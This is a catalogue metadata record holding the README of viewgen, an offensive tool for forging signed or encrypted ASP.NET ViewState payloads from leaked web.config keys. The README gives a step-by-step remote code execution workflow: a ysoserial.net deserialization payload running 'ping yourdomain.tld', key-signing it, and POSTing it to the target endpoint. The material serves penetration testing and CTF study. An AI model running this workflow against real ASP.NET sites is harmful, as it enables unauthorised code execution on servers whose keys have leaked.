{"id":13539780,"url":"https://github.com/0xacb/viewgen","last_synced_at":"2025-04-02T06:31:29.174Z","repository":{"id":34680723,"uuid":"180483221","full_name":"0xacb/viewgen","owner":"0xacb","description":"Viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys","archived":false,"fork":false,"pushed_at":"2025-02-01T14:52:29.000Z","size":66,"stargazers_count":596,"open_issues_count":1,"forks_count":83,"subscribers_count":11,"default_branch":"main","last_synced_at":"2025-02-01T15:37:28.237Z","etag":null,"topics":["asp-net","hacking-tools","viewstate"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xacb.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-04-10T02:10:37.000Z","updated_at":"2025-02-01T14:52:33.000Z","dependencies_parsed_at":"2024-08-01T09:23:37.742Z","dependency_job_id":"4191b603-41b7-46c4-99a9-abd97653e8fc","html_url":"https://github.com/0xacb/viewgen","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xacb%2Fviewgen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xacb%2Fviewgen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xacb%2Fviewgen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xacb%2Fviewgen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xacb","download_url":"https://codeload.github.com/0xacb/viewgen/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767973,"owners_count":20830585,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["asp-net","hacking-tools","viewstate"],"created_at":"2024-08-01T09:01:31.865Z","updated_at":"2025-04-02T06:31:24.166Z","avatar_url":"https://github.com/0xacb.png","language":"Python","funding_links":[],"categories":["Python","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"ad92f6b801a18934f1971e2512f5ae4f\"\u003e\u003c/a\u003ePayload生成"],"readme":"# Viewgen\n\n### ASP.NET ViewState Generator\n\n**viewgen** is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or `web.config` files\n\n---------------\n\n### Installation\n\n**Requirements**: Python 3\n\n`pip3 install --user --upgrade -r requirements.txt` or `./install.sh`\n\n**Docker**\n\n`docker build -t viewgen .` or `docker pull 0xacb/viewgen`\n\n---------------\n\n### Usage\n```\n$ viewgen -h\nusage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER]\n               [--viewstateuserkey VIEWSTATEUSERKEY] [-c COMMAND] [--decode]\n               [--guess] [--check] [--vkey VKEY] [--valg VALG] [--dkey DKEY]\n               [--dalg DALG] [-u] [-e] [-f FILE] [--version]\n               [payload]\n\nviewgen is a ViewState tool capable of generating both signed and encrypted\npayloads with leaked validation keys or web.config files\n\npositional arguments:\n  payload               ViewState payload (base 64 encoded)\n\noptions:\n  -h, --help            show this help message and exit\n  --webconfig WEBCONFIG\n                        automatically load keys and algorithms from a\n                        web.config file\n  -m MODIFIER, --modifier MODIFIER\n                        VIEWSTATEGENERATOR value\n  --viewstateuserkey VIEWSTATEUSERKEY\n                        ViewStateUserKey CSRF value\n  -c COMMAND, --command COMMAND\n                        command to execute\n  --decode              decode a ViewState payload\n  --guess               guess signature and encryption mode for a given\n                        payload\n  --check               check if modifier and keys are correct for a given\n                        payload\n  --vkey VKEY           validation key\n  --valg VALG           validation algorithm\n  --dkey DKEY           decryption key\n  --dalg DALG           decryption algorithm\n  -u, --urlencode       URL encode viewstates\n  -e, --encrypted       ViewState is encrypted\n  -f FILE, --file FILE  read ViewState payload from file\n  --version             show viewgen version\n```\n\n---------------\n\n### Examples\n\n```bash\n$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 \"zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=\"\n[+] ViewState\n(('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None)\n[+] Signature\n7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6\n[+] Signature match\n\n$ viewgen --webconfig web.config --modifier CA0B0334 \"/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk\"\nr4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa\n\n$ viewgen --guess \"/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI=\"\n[+] ViewState is not encrypted\n[+] Signature algorithm: SHA1\n\n$ viewgen --guess \"zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=\"\n[!] ViewState is encrypted\n[+] Algorithm candidates:\nAES SHA1\nDES/3DES SHA1\n```\n\n---------------\n\n### Achieving Remote Code Execution\n\nLeaking the `web.config` file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used.\n\nYou can use the built-in `command` option ([ysoserial.net](https://github.com/pwntester/ysoserial.net) based) to generate a payload:\n\n```bash\n$ viewgen --webconfig web.config -m CA0B0334 -c \"ping yourdomain.tld\"\n```\n\nHowever, you can also generate it manually:\n\n**1 -** Generate a payload with [ysoserial.net](https://github.com/pwntester/ysoserial.net):\n\n```bash\n\u003e ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c \"ping yourdomain.tld\"\n```\n\n**2 -** Grab a modifier (`__VIEWSTATEGENERATOR` value) from a given endpoint of the webapp\n\n**3 -** Generate the signed/encrypted payload:\n\n```bash\n$ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD\n```\n\n**4 -** Send a `POST` request with the generated ViewState to the same endpoint\n\n**5 -** Profit 🎉🎉\n\n---------------\n\n**Thanks**\n\n- [@orange_8361](https://twitter.com/orange_8361), the author of *Why so Serials* (HITCON CTF 2018)\n- [@infosec_au](https://twitter.com/infosec_au)\n- [@smiegles](https://twitter.com/smiegles)\n- **BBAC**\n- All contributors\n\n---------------\n\n**CTF Writeups**\n\n- https://xz.aliyun.com/t/3019\n- https://cyku.tw/ctf-hitcon-2018-why-so-serials/\n\n**Blog Posts**\n\n- https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/\n\n**Talks**\n\n- https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf\n- https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints\n\n---------------\n\n### ⚠ Legal Disclaimer ⚠\n\nThis project is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this tool.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xacb%2Fviewgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xacb%2Fviewgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xacb%2Fviewgen/lists"}